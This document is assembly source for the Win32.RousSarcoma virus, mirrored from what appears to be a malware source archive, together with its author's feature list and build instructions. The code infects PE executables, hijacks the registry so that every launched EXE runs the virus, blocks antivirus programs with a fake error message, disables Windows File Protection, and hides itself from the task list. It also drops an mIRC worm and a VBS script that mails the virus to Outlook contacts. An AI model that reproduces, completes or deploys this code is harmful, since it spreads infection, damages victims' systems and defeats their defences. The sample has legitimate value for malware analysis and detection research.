mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
1810 lines
53 KiB
NASM
1810 lines
53 KiB
NASM
|
||
;
|
||
;
|
||
; .--------------------------------.
|
||
; | |
|
||
; | Win32.RousSarcoma by SnakeByte |
|
||
; | SnakeByte@kryptocrew.de |
|
||
; | www.kryptocrew.de/snakebyte |
|
||
; .__________________________________.
|
||
;
|
||
;
|
||
; This virus was created by the idea of coding a retro virus, which
|
||
; is able too fool with some AV's. I was not able to realize all my ideas,
|
||
; but I think it is some fun. This virus uses some tricks to make disinfection
|
||
; harder. I came to the idea of making a virus which is able to drop itself to
|
||
; the original EXE File, when I saw that most AV's do not detect the first
|
||
; generation of a lot of viruses. Therefore the one part of this virus stays
|
||
; undetected by heuristics. Generally this virus consits of 2 parts. The EXE File
|
||
; Part and the one which is executed with an infected file. It "hooks" the execution
|
||
; of every EXE File and does not execute it if it is an AV. If it is none, it gets
|
||
; infected and started. Before starting the file it also checks if there is an
|
||
; mirc.ini in the same path. If there is one, it drops a mirc script worm. In Addition
|
||
; to this, the virus install itself in the registry to get started every time with windows.
|
||
; It searches the registry for more paths to infect files there. If it can't find more
|
||
; paths it drops a vbs script to send the worm around via Outlook.
|
||
;
|
||
; I am not good at writing so here is an overview of what
|
||
; the virus does :
|
||
;
|
||
;
|
||
; Name : Win32.RousSarcoma
|
||
; Type : PE-Appender by increasing last section
|
||
; Worming : Yes, mIRC Script and VBS Worm
|
||
; Operating System : Win32
|
||
; Author : SnakeByte
|
||
; Payload : None, too boring to write one ;) [ Got some other interesting stuff
|
||
; in mind i want to code as soon as possible ]
|
||
; Virus Size : 8192 Bytes
|
||
; Infection Mark : A-AV
|
||
; Encryption : None
|
||
; Autostart : RunOnce & exefiles
|
||
; Anti-Bait : Does not infect files < 20000 Bytes
|
||
; Anti-Debugging : Yes, against SoftIce and Int 1h tracing
|
||
; Anti-AV : Yes, does not allow the execution of several AV's
|
||
; disables Win2k File Protection
|
||
; Anti-User : Hides itself in files & several different places,
|
||
; is not shown at ctrl-alt-del list
|
||
; Runs at Level : Ring-3, but still infects every EXE File on executing
|
||
; Infects : 10 Files in the current directory,
|
||
; 10 Files in every path stored in this registry Key :
|
||
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
|
||
; Every EXE File which gets executed
|
||
;
|
||
; How to compile ( TASM 5.0 ) :
|
||
;
|
||
; tasm32 /z /ml /m3 RousSarc,,;
|
||
; tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib
|
||
; pewrsec RousSarc.EXE
|
||
;
|
||
; ( Make sure that the .EXE is uppercases !! )
|
||
;
|
||
; At the moment there are just 100 Bytes of Code i could add, with the file staying
|
||
; at 8192 Bytes. If I would add more, the file would grow to 12 KB. I decided to
|
||
; keep it small and leave stuff out like encryption or even poly. Maybe it could
|
||
; be optimized on several parts to make it fit with encryption to a 8 KB file,
|
||
; but I don't mind at the moment
|
||
;
|
||
;
|
||
;
|
||
; Thanks and greetz to :
|
||
;
|
||
; Lord Arz : Did you also finish your EXEFILES "hooking" something ? ;)
|
||
; DukeCS : Heh, when will KC be done ? *fg*
|
||
; Matsad : Sorry, for not coming, but i got no cash and need to see my girlfriend :P
|
||
; Lethal Mind : Heh, where are you ? ;(
|
||
; Ciatrix : Nice that you carry on !
|
||
;
|
||
;
|
||
|
||
; ***************************************************************************
|
||
; ------------------------[ Let's get ready to rumble ]----------------------
|
||
; ***************************************************************************
|
||
|
||
.586p
|
||
.model flat
|
||
jumps ; calculate Jumps
|
||
.radix 16 ; Hexadecimal numbers
|
||
|
||
; define some API's
|
||
extrn ExitProcess:PROC ; Host for EXE-Part
|
||
extrn LoadLibraryA:PROC ; nessesairy to get all other API's in the EXE-Part
|
||
extrn GetProcAddress:PROC ; cause I don't want DLL not found error's
|
||
|
||
extrn MessageBoxA:PROC ; for testing
|
||
|
||
.code
|
||
; Some constants
|
||
VirusSize equ 8192d ; Lenght of EXE-File
|
||
ImageBase equ 400000h ; Imagebase of our TASM generated EXE-File
|
||
|
||
CPart1 equ 600h
|
||
Gap1 equ 0A00h
|
||
|
||
; ###########################################################################
|
||
; -------------------[ This is the first part of the virus ]-----------------
|
||
; ###########################################################################
|
||
Virus:
|
||
; Here do we search for EXE-files and put the
|
||
; entire PE-Virus EXE to the end !
|
||
; we search for the needed api's with GetProcAdress
|
||
; and LoadModuleHandle, so we will not get Problems
|
||
; with missing DLL's or API's
|
||
|
||
mov ebp, 'VA-A' ; place a mark in ebp, to identify this part
|
||
|
||
lea eax, KERNEL32 ; push name of kernel32.dll
|
||
push eax
|
||
call LoadLibraryA ; save Handle
|
||
mov dword ptr [K32Handle], eax
|
||
test eax, eax ; if we failed we stop here
|
||
jz FirstGenHost
|
||
|
||
lea esi, Kernel32Names ; get all API's we need from kernel
|
||
lea edi, XFindFirstFileA
|
||
mov ebx, K32Handle
|
||
push NumberOfKernel32APIS
|
||
pop ecx
|
||
call GetAPI3 ; the procedure is needed in both parts
|
||
|
||
lea eax, advname ; push name of advapi32.dll
|
||
push eax
|
||
call LoadLibraryA ; save Handle
|
||
mov dword ptr [ADVHandle], eax
|
||
test eax, eax ; if we failed we stop here
|
||
jz FirstGenHost
|
||
|
||
lea esi, AdvapiNames ; get all API's we need from kernel
|
||
lea edi, XRegOpenKeyExA
|
||
mov ebx, ADVHandle
|
||
push NumberOfAdvapiAPIS
|
||
pop ecx
|
||
call GetAPI3 ; the procedure is needed in both parts
|
||
|
||
; Lets hide our Application from the CTRL-ALT-DEL List,
|
||
; to prevent us from being detected by a suspicious user ;)
|
||
|
||
; Check if the API is available
|
||
cmp dword ptr [XRegisterServiceProcess],0
|
||
je NoHide
|
||
|
||
; Get ID of our process
|
||
call dword ptr [XGetCurrentProcessId]
|
||
|
||
push 1 ; We want to run as a service
|
||
push eax ; process id
|
||
call dword ptr [XRegisterServiceProcess]
|
||
|
||
NoHide:
|
||
|
||
; ***************************************************************************
|
||
; ---------------------------[ Initialisation ]------------------------------
|
||
; ***************************************************************************
|
||
; Lets do a check on our commandline params,
|
||
; to see, if we got startet with a filename
|
||
; in it --> exefile method
|
||
|
||
call dword ptr [XGetCommandLineA]
|
||
mov dword ptr [CmdLine], eax
|
||
|
||
; the start of the commandline is in eax,
|
||
; we will parse it to the .exe part to see
|
||
; if there is anything afterwards
|
||
CommandReceive1:
|
||
cmp dword ptr [eax],'EXE.'
|
||
je CommandOK1
|
||
inc eax
|
||
jmp CommandReceive1
|
||
|
||
|
||
CommandOK1:
|
||
add eax, 4h ; eax points directly after the <name>.exe
|
||
cmp byte ptr [eax], 0 ; if the Commandline ends here, we do not need
|
||
je SetRunOnceKey ; to care about this ;)
|
||
|
||
add eax, 2h ; skip blanc and "
|
||
mov esi, eax ; save it
|
||
mov dword ptr [SaveBlanc], esi
|
||
|
||
push esi
|
||
call AVNameCheck
|
||
cmp esi, 0
|
||
je AVMessage
|
||
pop esi
|
||
jmp mIRCcheck
|
||
|
||
|
||
AVMessage: ; Arg ! Dirty AV found .. :P
|
||
pop esi ; lets drop a message
|
||
|
||
push 30h ; Style
|
||
push esi
|
||
push offset AVMsg
|
||
push 0
|
||
call MessageBoxA
|
||
jmp SetRunOnceKey
|
||
|
||
AVMsg db "File is corrupted. Can't start program",0
|
||
|
||
PathEnd dd 0h
|
||
|
||
mIRCcheck: ; we search for the path
|
||
pushad
|
||
|
||
push offset PathEnd
|
||
push offset NameBuffer
|
||
push 255d
|
||
push dword ptr [SaveBlanc]
|
||
call dword ptr [XGetFullPathNameA]
|
||
|
||
mov edi, dword ptr [PathEnd]
|
||
mov esi, offset mircINI ; append the mirc.ini to the path
|
||
mov ecx, 9d
|
||
rep movsb ; and now we need to check if the mIRC.ini does exist
|
||
; if it does, we found a mirc script to infect *eg*
|
||
; because we infect it bevore mIRC gets loaded, we do not
|
||
; need to fear the mIRC worm protection
|
||
lea esi, NameBuffer
|
||
call FindFirstFileProc
|
||
cmp eax, -1 ; we did not found the mirc.ini ;(
|
||
je NoMirc
|
||
|
||
push offset NameBuffer ; Write our entry to the file
|
||
push offset MIRCprot
|
||
push offset MOffset
|
||
push offset MIRCrfiles
|
||
call dword ptr [XWritePrivateProfileStringA]
|
||
|
||
mov edi, dword ptr [PathEnd]
|
||
mov esi, offset MIRCprot ; append the RousSarc.ini to the path
|
||
mov ecx, 13d
|
||
rep movsb ; and now we need to check if the mIRC.ini does exist
|
||
|
||
push 0
|
||
push 080h ; normal attribs
|
||
push 2h ; create a new file (always)
|
||
push 0
|
||
push 0
|
||
push 0C0000000h ; read + write
|
||
lea eax, NameBuffer ; file we create
|
||
push eax
|
||
Call dword ptr [XCreateFileA]
|
||
cmp eax, 0FFFFFFFFh
|
||
je NoMirc
|
||
|
||
push eax ; save filehandle
|
||
|
||
push 0 ; write script to file
|
||
push offset Write
|
||
push offset EndScript - offset MIRCscript
|
||
push offset MIRCscript
|
||
push Handle
|
||
call dword ptr [XWriteFile]
|
||
|
||
|
||
; Handle is still on the stack, so we close the file
|
||
call dword ptr [XCloseHandle]
|
||
|
||
NoMirc:
|
||
; close the search handle
|
||
push dword ptr [FindHandle]
|
||
call dword ptr [XCloseHandle]
|
||
popad
|
||
|
||
CommandReceive2: ; so we will be able to locate the file and
|
||
cmp byte ptr [eax],'.' ; infect it
|
||
je CommandOK2
|
||
cmp byte ptr [eax],0 ; check if we don't get too far
|
||
je Outbreak
|
||
inc eax
|
||
jmp CommandReceive2
|
||
CommandOK2:
|
||
add eax, 4h
|
||
cmp byte ptr [eax],0
|
||
jne ZeroAfterName
|
||
mov byte ptr [eax+1],0
|
||
ZeroAfterName:
|
||
mov byte ptr [eax],0 ; we place a Zero here, so we can do a findfirst
|
||
; on the filename which is in esi
|
||
|
||
push eax
|
||
push esi
|
||
call FindFirstFileProc
|
||
pop esi ; esi points to start of filename
|
||
pop ebx ; ebx points to the parameters
|
||
|
||
cmp eax, -1 ; file is not there :(
|
||
je Outbreak ; we infect some others
|
||
|
||
|
||
pushad ; save registers
|
||
lea edi, WFD_szFileName
|
||
mov ecx, ebx ; lenght of filename in ecx
|
||
sub ecx, esi
|
||
inc ecx
|
||
rep movsb ; write filename & path there
|
||
|
||
lea esi, WFD_szFileName ; point to filename
|
||
call InfectFile ; infect file
|
||
popad ; restore registers
|
||
|
||
; esi points to start of filename
|
||
; ebx points to the parameters
|
||
mov byte ptr [ebx], " " ; place a blank here
|
||
|
||
xor eax, eax ; let's execute the file
|
||
push offset ProcessInformation
|
||
push offset StartupInfo
|
||
push eax ; lpCurrentDirectory
|
||
push eax ; lpEnvironment
|
||
push eax ; Create_New_Process_Group & Normal_Priority_Class
|
||
push eax ; bInheritHandles
|
||
push eax ; lpThreadAttributes
|
||
push eax ; lpProcessAttributes
|
||
push esi ; filename with commandline
|
||
push eax ; command line
|
||
call dword ptr [XCreateProcessA]
|
||
|
||
|
||
SetRunOnceKey: ; Here we go if we found an AV or got
|
||
; or after executing a program
|
||
; lets add 2 autostart features
|
||
|
||
; Now we store the name of this file in the RunOnce key
|
||
; ( we add our file that regulary, that it will be always there,
|
||
; but nearly noone looks for files in this key *g* )
|
||
push offset RegHandle
|
||
push 001F0000h ; complete access
|
||
push 0h ; reserved
|
||
push offset RunOnceKey ; check if our key exists
|
||
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
|
||
call dword ptr [XRegOpenKeyExA]
|
||
|
||
cmp eax, 0
|
||
jne CheckOwnKey
|
||
|
||
xor eax, eax ; search for end of Systemdirectory
|
||
lea edi, NameBuffer
|
||
mov ebx, edi
|
||
repnz scasb
|
||
sub ebx, edi
|
||
inc ebx
|
||
|
||
push ebx
|
||
push offset NameBuffer ; Value
|
||
push 1h ; String
|
||
push 0 ; reserved
|
||
push offset Valuename ; value name
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegSetValueExA]
|
||
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegCloseKey]
|
||
|
||
|
||
jmp FirstGenHost
|
||
|
||
SaveBlanc dd 0h
|
||
EXEFilesKey db 'exefile\shell\open\command',0
|
||
EXEFilesValue db 'RousSarc.EXE "%1" %*',0
|
||
EFVSize equ $ - offset EXEFilesValue
|
||
|
||
; ***************************************************************************
|
||
; ------------------------------[ Outbreak ! ]-------------------------------
|
||
; ***************************************************************************
|
||
Outbreak: ; We got no commandline !
|
||
HKEY_CURRENT_USER equ 80000001h
|
||
HKEY_LOCAL_MACHINE equ 80000002h
|
||
; first of all, let's disable the win2k virus protection
|
||
|
||
push offset RegHandle
|
||
push 001F0000h ; complete access
|
||
push 0h ; reserved
|
||
push offset _2kProt ; check if our key exists
|
||
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
|
||
call dword ptr [XRegOpenKeyExA]
|
||
|
||
test eax, eax ; if we failed opening the key, we return
|
||
jz No2kProt
|
||
|
||
; Value to disable Windows File Protection
|
||
mov dword ptr [RegBuffer], 0ffffff9dh
|
||
|
||
push 4
|
||
push offset RegBuffer ; Value
|
||
push 4h ; REG_DWORD
|
||
push 0 ; reserved
|
||
push offset _2kProtValue ; value name
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegSetValueExA]
|
||
|
||
; Close it again
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegCloseKey]
|
||
|
||
No2kProt: ; Now we will copy ourselfes into the windows directory
|
||
; to be able to respond to every started file
|
||
; we just got the cmd line
|
||
mov eax, dword ptr [CmdLine]
|
||
CommandReceive3:
|
||
cmp dword ptr [eax],'EXE.'
|
||
je CommandOK3
|
||
inc eax
|
||
jmp CommandReceive3
|
||
|
||
|
||
CommandOK3:
|
||
add eax, 4h ; eax points directly after the <name>.exe
|
||
mov byte ptr [eax], 0 ; Place a 0 here to copy the file
|
||
|
||
push 255d
|
||
push offset NameBuffer
|
||
call dword ptr [XGetWindowsDirectoryA]
|
||
|
||
xor eax, eax ; search for end of Systemdirectory
|
||
lea edi, NameBuffer
|
||
repnz scasb
|
||
dec edi
|
||
lea esi, RunOnceName ; Append Filename
|
||
mov ecx, 13d
|
||
rep movsb
|
||
|
||
; Copy our file to the system directory
|
||
push 1
|
||
push offset NameBuffer ; where to store
|
||
push dword ptr [CmdLine] ; existing
|
||
call dword ptr [XCopyFileA]
|
||
|
||
; Lets set the Exefiles Key
|
||
push offset RegHandle
|
||
push 001F0000h ; complete access
|
||
push 0h ; reserved
|
||
push offset EXEFilesKey ; Open It
|
||
push 80000000h ; HKEY_CLASSES_ROOT
|
||
call dword ptr [XRegOpenKeyExA]
|
||
|
||
cmp eax, 0
|
||
jne CheckOwnKey
|
||
|
||
; Let's set our Value
|
||
push EFVSize
|
||
push offset EXEFilesValue ; Value
|
||
push 1h ; String
|
||
push 0h ; reserved
|
||
push 0h ; value name
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegSetValueExA]
|
||
|
||
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegCloseKey]
|
||
|
||
|
||
CheckOwnKey:
|
||
mov dword ptr [RegBuffer], 0h
|
||
|
||
push offset RegHandle
|
||
push 001F0000h ; complete access
|
||
push 0h ; reserved
|
||
push offset MyKey ; check if our key exists
|
||
push HKEY_CURRENT_USER ; HKEY_CURRENT_USER
|
||
call dword ptr [XRegOpenKeyExA]
|
||
|
||
test eax, eax ; if we failed opening the key, we return
|
||
jz KeySet
|
||
|
||
xor eax, eax ; clear eax
|
||
push offset Dispostiton
|
||
push offset RegHandle
|
||
push eax ; security attribs
|
||
push 001F0000h ; complete access
|
||
push eax ; REG_OPTION_NON_VOLATILE
|
||
push eax ; lpClass
|
||
push eax ; reserved
|
||
push offset MyKey ; Subkey
|
||
push HKEY_CURRENT_USER ; HKEY_CURRENT_USER
|
||
call dword ptr [XRegCreateKeyExA]
|
||
|
||
KeySet:
|
||
|
||
push offset RegData2
|
||
push offset RegBuffer
|
||
push offset RegData1
|
||
push 0
|
||
push offset Valuename
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegQueryValueExA]
|
||
; RegBuffer contains now a value after which
|
||
; we decide what to do, but first, we increment the
|
||
; value and save it
|
||
inc dword ptr [RegBuffer] ; Increment Value
|
||
|
||
push 4
|
||
push offset RegBuffer ; Value
|
||
push 4h ; REG_DWORD
|
||
push 0 ; reserved
|
||
push offset Valuename ; value name
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegSetValueExA]
|
||
|
||
; Close the key
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegCloseKey]
|
||
|
||
mov eax, dword ptr [RegBuffer]
|
||
|
||
; Now we decide what to do ( we start with 2 because we just incremented it and i will not do anything after
|
||
; the second start, cause we need one reboot to disable WFP ) :
|
||
;
|
||
; Value - what to do
|
||
;
|
||
; 2 - infect directory 1 of
|
||
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
|
||
; 3 - " " 2 " ""
|
||
; 4 - " " 3 " ""
|
||
; 5 - " " 4 " ""
|
||
; 6 - " " 5 " ""
|
||
; ... no more directorys in RegKey ? --> set value to 0
|
||
|
||
|
||
dec eax
|
||
dec eax
|
||
|
||
jz NoRegistryInfection
|
||
push eax
|
||
|
||
push offset RegHandle
|
||
push 001F0000h ; complete access
|
||
push 0h ; reserved
|
||
push offset AppPaths ; App Paths are stored here
|
||
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
|
||
call dword ptr [XRegOpenKeyExA]
|
||
|
||
pop eax
|
||
|
||
push 255d
|
||
push offset NameBuffer
|
||
push eax ; Key Number we want to retrieve
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegEnumKeyA]
|
||
cmp eax, 0
|
||
jne DropVBSWorm
|
||
|
||
push offset RegHandle2
|
||
push 001F0000h ; complete access
|
||
push 0h ; reserved
|
||
push offset NameBuffer ; App Paths are stored here
|
||
push dword ptr [RegHandle] ; HKEY_LOCAL_MACHINE
|
||
call dword ptr [XRegOpenKeyExA]
|
||
|
||
; Read Vakze
|
||
|
||
mov dword ptr [RegData2], 255d
|
||
|
||
push offset RegData2
|
||
push offset NameBuffer
|
||
push offset RegData1
|
||
push 0
|
||
push offset PathValue
|
||
push dword ptr [RegHandle2]
|
||
call dword ptr [XRegQueryValueExA]
|
||
|
||
push dword ptr [RegHandle2]
|
||
call dword ptr [XRegCloseKey]
|
||
|
||
lea edi, NameBuffer ; Remove ; to get directory
|
||
mov al, ';'
|
||
mov ecx, 254d
|
||
repnz scasb
|
||
dec edi
|
||
mov byte ptr [edi], 0
|
||
|
||
push offset CurrentPath ; Get Current dir and save it
|
||
push 255d
|
||
call dword ptr [XGetCurrentDirectoryA]
|
||
|
||
push offset NameBuffer ; set new directory
|
||
call dword ptr [XSetCurrentDirectoryA]
|
||
|
||
call InfectCurDir ; Infect the directory
|
||
|
||
push offset CurrentPath ; restore old directory
|
||
call dword ptr [XSetCurrentDirectoryA]
|
||
|
||
CloseRegInfection:
|
||
push dword ptr [RegHandle]
|
||
call dword ptr [XRegCloseKey]
|
||
|
||
|
||
NoRegistryInfection:
|
||
|
||
call InfectCurDir ; Infect the current directory
|
||
jmp FirstGenHost
|
||
|
||
|
||
DropVBSWorm: ; Ok, we found no more directorys in the App Paths
|
||
; Registry Key, so we will drop a little VBS Script
|
||
; and execute it, so the virus will also spread with
|
||
; the help of outlook
|
||
push 0
|
||
push 080h ; normal attribs
|
||
push 2h ; create a new file (always)
|
||
push 0
|
||
push 0
|
||
push 0C0000000h ; read + write
|
||
lea eax, VBSWorm
|
||
push eax
|
||
Call dword ptr [XCreateFileA]
|
||
cmp eax, 0FFFFFFFFh
|
||
je CloseRegInfection
|
||
|
||
push eax ; save filehandle
|
||
|
||
push 0 ; write script to file
|
||
push offset Write
|
||
push offset EndVBSScript - offset VBSscript
|
||
push offset VBSscript
|
||
push Handle
|
||
call dword ptr [XWriteFile]
|
||
|
||
|
||
; Handle is still on the stack, so we close the file
|
||
call dword ptr [XCloseHandle]
|
||
|
||
xor eax, eax ; let's execute the wormy script
|
||
push offset ProcessInformation
|
||
push offset StartupInfo
|
||
push eax ; lpCurrentDirectory
|
||
push eax ; lpEnvironment
|
||
push eax ; Create_New_Process_Group & Normal_Priority_Class
|
||
push eax ; bInheritHandles
|
||
push eax ; lpThreadAttributes
|
||
push eax ; lpProcessAttributes
|
||
push offset VBSWorm ; filename with commandline
|
||
push eax ; command line
|
||
call dword ptr [XCreateProcessA]
|
||
|
||
|
||
jmp CloseRegInfection
|
||
|
||
VBSscript:
|
||
db 'On Error Resume Next', 13d, 10d
|
||
db 'Dim R', 13d, 10d
|
||
db 'Set RS=CreateObject("Outlook.Application")', 13d, 10d
|
||
db 'For R=1 To 500', 13d, 10d
|
||
db 'Set Mail=RS.CreateItem(0)', 13d, 10d
|
||
db 'Mail.to=RS.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)', 13d, 10d
|
||
db 'Mail.Subject="Funny Thing !"', 13d, 10d
|
||
db 'Mail.Body="Take a look at this and just start laughing !"', 13d, 10d
|
||
db 'Mail.Attachments.Add("C:\RousSarc.EXE")', 13d, 10d
|
||
db 'Mail.Send', 13d, 10d
|
||
db 'Next', 13d, 10d
|
||
db 'RS.Quit', 13d, 10d, 13d, 10d
|
||
EndVBSScript:
|
||
|
||
VBSWorm db 'C:\RousSarc.vbs',0
|
||
|
||
AppPaths db 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths',0
|
||
PathValue db 'Path',0
|
||
|
||
RegData2 dd 4h ; Bytes to read in Buffer
|
||
RegBuffer dd 0h ; Buffer
|
||
Valuename db 'RousSarcoma',0
|
||
MyKey db 'RousSarcoma',0
|
||
RegHandle2 dd 0h
|
||
|
||
|
||
|
||
|
||
; ***************************************************************************
|
||
; --------------------------[ Infection current dir ]------------------------
|
||
; ***************************************************************************
|
||
|
||
; We got all we need
|
||
; let's party ;)
|
||
InfectCurDir: ; Infect up to 10 files in the current directory
|
||
; use FindFirstFile / Next to find files
|
||
; 10 files at max.
|
||
mov dword ptr [InfCounter], 10d
|
||
|
||
|
||
lea esi, filemask
|
||
call FindFirstFileProc
|
||
|
||
inc eax
|
||
jz EndInfectCurDir1 ; did we get all ?
|
||
dec eax
|
||
|
||
InfectCurDirFile:
|
||
; Filename in esi
|
||
lea esi, WFD_szFileName
|
||
call InfectFile ; Try it !
|
||
cmp dword ptr [InfCounter], 0h
|
||
jna EndInfectCurDir2
|
||
|
||
call FindNextFileProc
|
||
|
||
test eax, eax
|
||
jnz InfectCurDirFile
|
||
|
||
EndInfectCurDir2: ; close Search - Handle
|
||
|
||
push dword ptr [FindHandle]
|
||
call dword ptr [XFindClose]
|
||
|
||
EndInfectCurDir1:
|
||
|
||
ret
|
||
|
||
|
||
; ***************************************************************************
|
||
; -------------------------[ prepare Infection ]----------------------------
|
||
; ***************************************************************************
|
||
|
||
InfectFile: ; filename is in WFD_szFileName
|
||
; esi shows to this value
|
||
|
||
call AVNameCheck
|
||
cmp esi, 0h
|
||
je NoInfection
|
||
|
||
lea esi, WFD_szFileName
|
||
|
||
; ignore files smaller than 20000 Bytes
|
||
cmp dword ptr [WFD_nFileSizeLow], 20000d
|
||
jbe NoInfection
|
||
; ignore files bigger than 4,3 GB
|
||
cmp dword ptr [WFD_nFileSizeHigh], 0
|
||
jne NoInfection
|
||
|
||
call OpenFile ; Open File
|
||
jc NoInfection ; stop if there are problems
|
||
mov esi, eax
|
||
|
||
call CheckMZSign ; Check for DOS-Stub
|
||
jc Notagoodfile
|
||
|
||
cmp word ptr [eax+3Ch], 0h
|
||
je Notagoodfile
|
||
|
||
xor esi, esi ; get PE-Header
|
||
mov esi, [eax+3Ch]
|
||
; Check if file is corrupted
|
||
cmp dword ptr [WFD_nFileSizeLow], esi
|
||
jb Notagoodfile
|
||
|
||
add esi, eax
|
||
mov edi, esi
|
||
call CheckPESign ; Check for PE-Header
|
||
jc Notagoodfile
|
||
; Check Infection Mark
|
||
; --> A-AV ( Anti- Anti-Virus )
|
||
|
||
cmp dword ptr [esi+4Ch], 'VA-A'
|
||
jz Notagoodfile
|
||
|
||
mov bx, word ptr [esi+16h]; Get Characteristics
|
||
and bx, 0F000h ; select Dll-Flag
|
||
cmp bx, 02000h
|
||
je Notagoodfile ; we won't no DLL Files
|
||
|
||
mov bx, word ptr [esi+16h]; Check for DLL-Files
|
||
and bx, 00002h
|
||
cmp bx, 00002h
|
||
jne Notagoodfile
|
||
|
||
call InfectEXE ; Infect this sucker !
|
||
jc NoInfection
|
||
|
||
Notagoodfile:
|
||
call UnMapFile
|
||
|
||
NoInfection:
|
||
ret
|
||
|
||
; ***************************************************************************
|
||
; ------------------------------[ File-Handling ]----------------------------
|
||
; ***************************************************************************
|
||
; FileName needs to be in esi
|
||
OpenFile:
|
||
xor eax,eax ; Open Files
|
||
push eax
|
||
push eax
|
||
push 3h
|
||
push eax
|
||
inc eax
|
||
push eax
|
||
push 80000000h or 40000000h
|
||
push esi ; Filename is in ESI
|
||
call dword ptr [XCreateFileA]
|
||
|
||
inc eax
|
||
jz Closed
|
||
dec eax
|
||
|
||
mov dword ptr [FileHandle],eax
|
||
mov ecx, dword ptr [WFD_nFileSizeLow]
|
||
|
||
CreateMap:
|
||
push ecx
|
||
xor eax,eax
|
||
push eax
|
||
push ecx
|
||
push eax
|
||
push 00000004h
|
||
push eax
|
||
push dword ptr [FileHandle]
|
||
call dword ptr [XCreateFileMappingA]
|
||
|
||
mov dword ptr [MapHandle],eax
|
||
|
||
pop ecx ; Get Map-Site
|
||
test eax, eax
|
||
jz CloseFile ; Datei wieder...
|
||
|
||
xor eax,eax
|
||
push ecx
|
||
push eax
|
||
push eax
|
||
push 2h
|
||
push dword ptr [MapHandle]
|
||
call dword ptr [XMapViewOfFile]
|
||
|
||
or eax,eax
|
||
jz UnMapFile
|
||
; EAX contains starting offset of the map
|
||
mov dword ptr [MapAddress],eax
|
||
clc
|
||
ret
|
||
|
||
UnMapFile:
|
||
call UnMapFile2
|
||
|
||
CloseFile:
|
||
push dword ptr [FileHandle]
|
||
call [XCloseHandle]
|
||
|
||
Closed:
|
||
stc
|
||
ret
|
||
|
||
UnMapFile2:
|
||
push dword ptr [MapAddress]
|
||
call dword ptr [XUnmapViewOfFile]
|
||
|
||
push dword ptr [MapHandle]
|
||
call dword ptr [XCloseHandle]
|
||
|
||
ret
|
||
|
||
|
||
; ***************************************************************************
|
||
; ---------------------[ Infection of the EXE-File ]-------------------------
|
||
; ***************************************************************************
|
||
|
||
InfectEXE: ; MapAddress contains the start address of the file
|
||
|
||
mov ecx, [esi+3Ch] ; esi points to PE-Header
|
||
; ecx = Alignment Faktor
|
||
mov eax, dword ptr [WFD_nFileSizeLow]
|
||
add eax, VirusSize
|
||
|
||
call Align
|
||
mov dword ptr [NewSize], eax
|
||
xchg ecx, eax
|
||
|
||
pushad
|
||
call UnMapFile2 ; remap file
|
||
popad
|
||
|
||
call CreateMap
|
||
jc NoEXE
|
||
; esi = PE-Header
|
||
mov esi, dword ptr [eax+3Ch]
|
||
|
||
add esi, eax
|
||
mov edi, esi ; edi = esi
|
||
; eax = Sections
|
||
; get last section
|
||
movzx eax, word ptr [edi+06h]
|
||
dec eax
|
||
imul eax, eax, 28h
|
||
add esi, eax
|
||
add esi, 78h ; point to Directory Table
|
||
|
||
mov edx, [edi+74h] ; Get Directory Entrys
|
||
shl edx, 3h
|
||
add esi, edx
|
||
; get EIP
|
||
mov eax, [edi+28h]
|
||
mov dword ptr [OldEIP], eax
|
||
|
||
; get Imagebase
|
||
mov eax, [edi+34h]
|
||
mov dword ptr [OldBase], eax
|
||
|
||
mov edx, [esi+10h] ; get size of RAW-Data
|
||
mov ebx, edx
|
||
add edx, [esi+14h] ; edx = points to raw-data
|
||
push edx
|
||
|
||
mov eax, ebx
|
||
add eax, [esi+0Ch] ; EAX contains now Start of our file
|
||
; but we need to point it to the second part of the virus
|
||
add eax, ( offset SecondPart - ImageBase ) - Gap1
|
||
; the 0A00h are caused by the uninitialized data
|
||
|
||
mov [edi+28h], eax
|
||
mov dword ptr [NewEIP], eax
|
||
|
||
mov eax, [esi+10h] ; enlarge Raw-Data
|
||
push eax
|
||
add eax, VirusSize ; VirusSize = Size of entire file
|
||
mov ecx, [edi+3Ch] ; align it
|
||
call Align
|
||
|
||
mov [esi+10h], eax ; save in file
|
||
|
||
pop eax ; new Virtual-Size
|
||
add eax, VirusSize
|
||
mov [esi+08h], eax
|
||
|
||
pop edx
|
||
|
||
mov eax, [esi+10h]
|
||
add eax, [esi+0Ch] ; get new imagesize
|
||
mov [edi+50h], eax
|
||
; change the section flags
|
||
or dword ptr [esi+24h], 0A0000020h
|
||
; Write infection mark to file
|
||
; --> A-AV ( Anti- Anti-Virus )
|
||
mov dword ptr [edi+4Ch], 'VA-A'
|
||
|
||
xchg edi, edx
|
||
|
||
; save the start of the virus in file
|
||
mov dword ptr [StartofVirusinFile], edi
|
||
add edi, dword ptr [MapAddress]
|
||
push edi
|
||
|
||
call OpenMyself
|
||
; lets save the right Imagebase and EIP
|
||
; inside our buffered file ;)
|
||
|
||
; Save EIP & Imagebase
|
||
mov eax, dword ptr [OldEIP]
|
||
lea edi, FileBuffer
|
||
add edi, (offset retEIP - ImageBase) - Gap1
|
||
stosd
|
||
|
||
mov eax, dword ptr [OldBase]
|
||
lea edi, FileBuffer
|
||
add edi, (offset retBas - ImageBase) - Gap1
|
||
stosd
|
||
|
||
pop edi
|
||
lea esi, FileBuffer
|
||
mov ecx, VirusSize ; First Part
|
||
rep movsb ; append
|
||
; we need two steps, otherwise we would fill the
|
||
|
||
dec byte ptr [InfCounter]
|
||
clc
|
||
